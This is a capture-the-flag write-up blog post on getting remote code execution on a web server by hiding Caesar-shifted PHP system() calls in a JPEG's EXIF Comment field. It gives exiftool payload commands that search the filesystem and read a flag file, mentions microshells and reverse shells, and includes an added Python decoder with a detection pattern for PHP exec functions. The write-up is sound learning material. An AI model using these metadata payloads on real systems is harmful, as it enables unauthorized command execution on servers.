Find Flag in Image File Upload

CurlS
4 min read · Oct 13, 2019


Another day, another challenge to solve. This time there is a flag on the webserver waiting to be discovered. The starting point is a webapp with restricted image upload functions. Let’s get deeper into detail …

The goal of the challenge was to find the flag on the server. As the URL was already given in the challenge, I decided not to run an nmap port scan. The webapp has very basic functionality, such as uploading images. There was a hint to use JPEG images, to make life easier :-). Uploading files of another type was not possible.

image upload form

I used a simple cat picture from Google Images for the upload, to which the response was that the file succes.jpeg was not found. Renaming the uploaded image to success.jpeg solved the problem, and the server returned a result containing some gibberish data.

It looks like the upload worked; the next step is to figure out how to get the flag.

At this point there might be different ways to solve the challenge. One might try to find out where the pictures are saved using a directory bruteforce. Maybe there is a vulnerability in the upload function that allows bypassing the file type restrictions. If that were possible, one could upload a payload script such as a PHP microshell, which runs the commands appended to the end of the URL on the server, and finally start a reverse shell, etc. Another interesting way is to inject a command in the filename; see here for more details.

Another possibility is to insert e.g. PHP code into the image metadata. A JPEG file can store a lot of information alongside the actual image data: EXIF metadata such as the camera model, description, comments, etc. Using exiftool, a command line tool for displaying and manipulating EXIF metadata in various document and image formats, the first try was to modify the Comment field and see whether that influences the response from the server.

exiftool -Comment='----------ABCDEFG---------' success.jpeg

The response from the server is:

This was a success, as the response reflects the metadata, but it looks like the input “ABCDEFG” is Caesar cipher encoded and appears as part of the ciphertext.

Plaintext:  mnopqrstuvwxyzabcdefghijkl
Ciphertext: abcdefghijklmnopqrstuvwxyz

The next step is to try to include PHP code in the Comment field. As we are trying to find a flag/gold nugget, one of the following commands can be injected into the metadata: <?php system('find / -name *flag*'); ?> or
<?php system('find / -name *nugget'); ?>

# exiftool -Comment='<?dvd gmghsa("twbr / -boas *biuush"); ?>' success.jpeg

For more details, here is the substitution and value I used in CyberChef.
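As an added example (not code from the write-up), the following Python reproduces the substitution from the Plaintext/Ciphertext table above, recovers the shift from a probe and its reflection the way the ABCDEFG test did, and shows why a defender inspecting uploaded metadata must run detection on the decoded form: the raw comment never contains the string "system(". The shift value of 12 is read from the table; the list of flagged PHP functions is my own assumption.

```python
import re
import string

# Substitution observed in the challenge (from the Plaintext/Ciphertext table):
# the server shifts each letter of the EXIF Comment by 12 ('a' -> 'm') before
# interpreting it, so the payload had to be pre-shifted by 14 (= -12).
SERVER_SHIFT = 12

# Constructed copy (ASCII quotes) of the Comment the write-up wrote into success.jpeg.
RAW_COMMENT = '<?dvd gmghsa("twbr / -boas *biuush"); ?>'

def caesar(text: str, shift: int) -> str:
    """Shift ASCII letters by `shift` (mod 26); leave every other character alone.
    Slashes, dots, quotes, '*', '<?' and ';' pass through untouched, which is why
    the PHP tags and the file path survive the server's transform."""
    out = []
    for ch in text:
        if ch in string.ascii_lowercase:
            out.append(chr((ord(ch) - 97 + shift) % 26 + 97))
        elif ch in string.ascii_uppercase:
            out.append(chr((ord(ch) - 65 + shift) % 26 + 65))
        else:
            out.append(ch)
    return "".join(out)

def infer_shift(sent: str, reflected: str) -> int:
    """Recover the shift from a probe string and its reflection in the response.
    Raises ValueError unless every letter moved by the same amount."""
    shifts = {(ord(r.lower()) - ord(s.lower())) % 26
              for s, r in zip(sent, reflected) if s.isalpha() and r.isalpha()}
    if len(shifts) != 1:
        raise ValueError(f"not a single Caesar shift: {sorted(shifts)}")
    return shifts.pop()

def as_seen_by_server(comment: str) -> str:
    """The string the vulnerable server actually interprets for a given Comment."""
    return caesar(comment, SERVER_SHIFT)

# Detection indicator (assumed list): a PHP open tag followed by a command-execution
# function. Matching the raw comment alone misses 'gmghsa(' -> 'system('.
DANGEROUS = re.compile(r"<\?(php)?\s.*\b(system|exec|shell_exec|passthru)\s*\(",
                       re.I | re.S)

def flag_comment(comment: str) -> bool:
    """True if the Comment is dangerous before or after the server-side shift."""
    return bool(DANGEROUS.search(comment) or DANGEROUS.search(as_seen_by_server(comment)))
```
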

And indeed we receive the path to the flag!

Now it is possible to get the content of the file:
cat /var/www/html/gold.nugget

See the CyberChef output here.

exiftool -Comment='<?dvd gmghsa("qoh /jof/kkk/vhaz/uczr.biuush"); ?>' success.jpeg

And we receive the hidden text/flag:

This was another interesting upload vulnerability challenge. There are so many kinds of upload vulnerabilities, and the topic is quite common in CTFs. Depending on the given circumstances, it might be possible to bypass the file type filtering and get a reverse shell, or to find other open ports. It is not always easy to find out what the best and fastest way might be. That comes with more experience.

Any feedback (good or bad) is much appreciated.


Working in Infosec. Interested in many things, from technical perspective -> security, ctfs, coding, reverse engineering,… and in general -> love life. She.